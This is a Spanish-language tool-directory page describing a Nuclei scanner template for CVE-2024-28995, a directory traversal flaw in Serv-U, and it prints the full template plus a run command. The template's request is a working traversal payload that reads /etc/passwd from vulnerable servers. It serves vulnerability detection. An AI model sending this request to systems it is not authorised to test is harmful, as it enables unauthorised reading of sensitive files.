Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-28995-Nuclei-Template — Plantilla de Nuclei para detectar CVE-2024-28995, una vulnerabilidad de directory traversal en el servidor FTP Serv-U, que permite la lectura de archivos a través de solicitudes HTTP manipuladas. | Kitploit
Herramientas/GitHubGitHub/huseyinstif/cve-2024-28995-nuclei-template
Escáneres de VulnerabilidadesEscáneres de Vulnerabilidades WebAnálisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubhuseyinstif/cve-2024-28995-nuclei-template

CVE-2024-28995-Nuclei-Template

Plantilla de Nuclei para detectar CVE-2024-28995, una vulnerabilidad de directory traversal en el servidor FTP Serv-U, que permite la lectura de archivos a través de solicitudes HTTP manipuladas.

Ver Repositorio
114hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Plantilla Nuclei para CVE-2024-28995

Verifica la vulnerabilidad de directory traversal en versiones de Serv-U 15.4.2 e inferiores, que permite leer archivos sensibles como /etc/passwd.

Detalles de la Plantilla

id: CVE-2024-28995

info:
  name: Serv-U Directory Traversal Vulnerability
  author: Hüseyin TINTAŞ
  severity: high
  description: Checks for directory traversal vulnerability in Serv-U versions 15.4.2 and below, which allows reading sensitive files like /etc/passwd.
  reference:
    - https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  tags: pathtraversal,cve,high,serv-u

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?InternalDir=\\..\\..\\..\\..\\etc^&InternalFile=passwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "root:x:"
          - "daemon:x:"
          - "bin:x:"
        part: body

      - type: status
        status:
          - 200

      - type: word
        words:
          - "Server: Serv-U"
        part: header



Uso

Para usar esta plantilla con Nuclei, guarda el contenido de la plantilla en un archivo llamado CVE-2024-28995.yaml y ejecuta el siguiente comando:

nuclei -t CVE-2024-28995.yaml -u <target-url>

Reemplaza <target-url> con la URL del objetivo que deseas escanear.

Contacto

Para consultas o más información, puedes contactarme a través de:

  • LinkedIn
  • Twitter
Descargar herramienta